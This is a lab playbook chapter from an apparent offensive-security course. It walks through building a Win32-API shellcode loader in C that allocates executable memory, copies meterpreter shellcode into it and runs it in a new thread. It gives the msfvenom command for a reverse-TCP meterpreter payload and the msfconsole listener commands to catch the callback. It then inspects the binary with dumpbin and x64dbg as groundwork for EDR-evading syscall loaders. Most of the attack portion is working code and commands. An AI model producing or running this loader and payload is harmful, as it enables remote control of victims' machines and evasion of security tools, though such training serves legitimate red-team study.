08: Chapter 4 | LAB Exercise Playbook
In this exercise we will create our first shellcode loader based on Win32 APIs (high level APIs). This loader will be our reference for further development into a direct syscall and indirect syscall loader.
The code template for this tutorial can be found here.
Task Nr. | Task Description |
---|---|
1 | Download the Win32-API Loader POC for this chapter. |
2 | The code in the POC is partially complete. Following the instructions in this playbook, complete the code by placing the provided code for the four Windows APIs in the correct order. |
3 | Create the meterpreter shellcode, paste it into the loader, and compile the loader. |
4 | Create and run a staged x64 meterpreter listener using msfconsole. |
5 | Run your compiled .exe and check that a stable command and control channel opens. |
Task Nr. | Task Description |
---|---|
6 | Use the Visual Studio dumpbin tool to analyse the Win32-API Loader. Are any Win32 APIs being imported from kernel32.dll? Is the result what you expected? |
7 | Use x64dbg to debug or analyse the Win32-API Loader. |
The Win32 API loader is technically simple, which in my opinion makes it a good starting point for rewriting it step by step into a low-level loader that uses direct or indirect system calls. The code for the Win32 API loader works as follows.
First, we define the thread function `ExecuteShellcode`, which is used later in the code to execute our shellcode. A thread function is the function that runs when a new thread is started. In Windows, `CreateThread` expects a pointer to such a function and uses it as the starting address of the new thread. In our loader, the thread function receives the address of the shellcode as its parameter and calls it.
// Define the thread function for executing shellcode
// This function will be executed in a separate thread created later in the main function
DWORD WINAPI ExecuteShellcode(LPVOID lpParam) {
// Create a function pointer called 'shellcode' and initialize it with the address of the shellcode
void (*shellcode)() = (void (*)())lpParam;
// Call the shellcode function using the function pointer
shellcode();
// Return 0 as the thread exit code
return 0;
}
Within the main function, the variable `code` is defined, which stores the meterpreter shellcode. The content of `code` is stored in the `.text` (code) section of the PE structure or, if the shellcode is larger than 255 bytes, in the `.rdata` section.
// Insert the Meterpreter shellcode as an array of unsigned chars (replace the placeholder with actual shellcode)
unsigned char code[] = "\xfc\x48\x83...";
The `VirtualAlloc` Win32 API reserves, commits, or changes the state of a region of pages in the virtual address space of the calling process. This code block declares the `void` pointer `exec`, which stores the base address of the allocated memory region returned by `VirtualAlloc`. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.
// Allocate Virtual Memory with PAGE_EXECUTE_READWRITE permissions to store the shellcode
// 'exec' will hold the base address of the allocated memory region
void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
The `WriteProcessMemory` function provided by the Windows API writes data to an area of memory in a specified process. The entire area to be written must be accessible (in our case it was allocated beforehand with `VirtualAlloc`); an attempt to write to inaccessible memory fails. We use `WriteProcessMemory` to copy the meterpreter shellcode into the committed memory. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.
// Copy the shellcode into the allocated memory region using WriteProcessMemory
SIZE_T bytesWritten;
WriteProcessMemory(GetCurrentProcess(), exec, code, sizeof(code), &bytesWritten);
The Win32 `CreateThread` API allows you to create a new thread of execution within your process. In our case, we are using this API to run our shellcode in a new thread rather than in the main thread. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.
// Create a new thread to execute the shellcode
// Pass the address of the ExecuteShellcode function as the thread function, and 'exec' as its parameter
// The returned handle of the created thread is stored in hThread
HANDLE hThread = CreateThread(NULL, 0, ExecuteShellcode, exec, 0, NULL);
By calling the Windows API `WaitForSingleObject`, we ensure that the shellcode thread completes its execution before the main thread exits. Without `WaitForSingleObject`, the shellcode thread would still be started, but when the main thread returns from `main()`, the process exits and all threads that are still running are terminated. This includes the shellcode thread, which would be abruptly terminated even if it had not finished executing. This is why `WaitForSingleObject` is important and necessary. For more details about the API or arguments, parameters, etc., see the official Microsoft documentation.
// Wait for the shellcode execution thread to finish executing
// This ensures the main thread doesn't exit before the shellcode has finished running
WaitForSingleObject(hThread, INFINITE);
Your task now is to complete the Win32 API loader POC by using the following code for the required Windows APIs. Remember that the order matters: allocate memory, copy the shellcode into that memory, execute it in a new thread, and keep the main thread from exiting until the new thread has finished.
Code
// Create a new thread to execute the shellcode
// Pass the address of the ExecuteShellcode function as the thread function, and 'exec' as its parameter
// The returned handle of the created thread is stored in hThread
HANDLE hThread = CreateThread(NULL, 0, ExecuteShellcode, exec, 0, NULL);
// Copy the shellcode into the allocated memory region using WriteProcessMemory
SIZE_T bytesWritten;
WriteProcessMemory(GetCurrentProcess(), exec, code, sizeof(code), &bytesWritten);
// Allocate Virtual Memory with PAGE_EXECUTE_READWRITE permissions to store the shellcode
// 'exec' will hold the base address of the allocated memory region
void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Wait for the shellcode execution thread to finish executing
// This ensures the main thread doesn't exit before the shellcode has finished running
WaitForSingleObject(hThread, INFINITE);
In this step, we will create our meterpreter shellcode for the Win32-API Loader with msfvenom in Kali Linux. To do this, we will use the following command and create x64 staged meterpreter shellcode.
kali>
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt
The shellcode can then be copied into the Win32-API Loader POC by replacing the placeholder in the `unsigned char code[]` array, and the POC can be compiled as an x64 release.
Before we test the functionality of our Win32-API Loader, we need to create a listener within msfconsole.
kali>
msfconsole
msf>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost IPv4_Redirector_or_IPv4_Kali
set lport 80
set exitonsession false
run
Once the listener has been successfully started, you can run your compiled Win32-API Loader. If all goes well, you should see an incoming command and control session.
The Visual Studio tool dumpbin can be used to check which Windows APIs are imported via `kernel32.dll`. The following command can be used to check the imports. Which results do you expect?
cmd>
cd C:\Program Files (x86)\Microsoft Visual Studio\2019\Community
dumpbin /imports Win32-API.exe
Results
In the case of the Win32-API Loader, you should see that the Windows APIs VirtualAlloc, WriteProcessMemory, CreateThread and WaitForSingleObject are imported from kernel32.dll.
The first step is to run your Win32-API Loader and check that the .exe is running and that a stable meterpreter C2 channel is open. Then we open x64dbg and attach to the running process. Note that if you open the Win32-API Loader directly in x64dbg, you need to run the assembly first.
Next, we want to check which APIs (Win32 or native) are imported, whether they are the expected ones, and from which module or memory location they are imported. Remember that no direct syscalls or similar are used in the Win32-API Loader. What results do you expect?
Results
Checking the imported symbols in our Win32-API Loader, we should see that the Win32 APIs `VirtualAlloc`, `WriteProcessMemory`, `CreateThread` and `WaitForSingleObject` are imported from `kernel32.dll`. So the result is the same as with dumpbin and seems to be valid.
We also want to check in which module or memory location the `syscall stub` of the native functions used is implemented, and from which module or memory location the `syscall` instruction and the `return` instruction are executed.
Results
We use the "Follow imported address" function in the Symbols tab by right-clicking on one of the four Win32 APIs used, e.g. `VirtualAlloc`, and we can see that we jump to a location in `kernel32.dll`.
In the next step we use the "Follow in Disassembler" function to follow the memory address that jumps into the memory of `kernelbase.dll`.
Then we use the "Follow in Disassembler" function again and follow the address that calls the native function `NtAllocateVirtualMemory` or `ZwAllocateVirtualMemory` from a memory location in `ntdll.dll`.
As expected, we go the normal way via `malware.exe` -> `kernel32.dll` -> `kernelbase.dll` -> `ntdll.dll` -> `syscall`. The following illustration shows that the `syscall` instruction and the `return` instruction are executed from a memory region in `ntdll.dll`, as expected.
Finally, we want to identify the meterpreter shellcode in the `.text` section of the shellcode loader. To do this, have a look at the disassembled code of Win32API-Loader.exe.
Results
By using "Follow in Disassembler" on the loader module, we can jump to the disassembled code of the shellcode loader. In my case, the meterpreter shellcode can be identified at the very top. As long as your shellcode size is less than or equal to 255 bytes, you will find the shellcode in the `.text` section of the shellcode loader. If the shellcode size is greater than 255 bytes, the shellcode will be stored in the `.rdata` section of the loader.
- Syscall execution via normal transition from `Win32-API Loader.exe` -> `kernel32.dll` -> `kernelbase.dll` -> `ntdll.dll` -> `syscall`
  - Win32-API Loader imports Windows APIs from `kernel32.dll`...
  - ...then accesses or imports the native functions from `ntdll.dll`...
  - ...and finally executes the code of the corresponding native function, including the syscall instruction.
- If an EDR uses user mode hooking in `kernel32.dll` or `ntdll.dll`, the execution flow of `malware.exe` is redirected to the EDR's `hooking.dll`.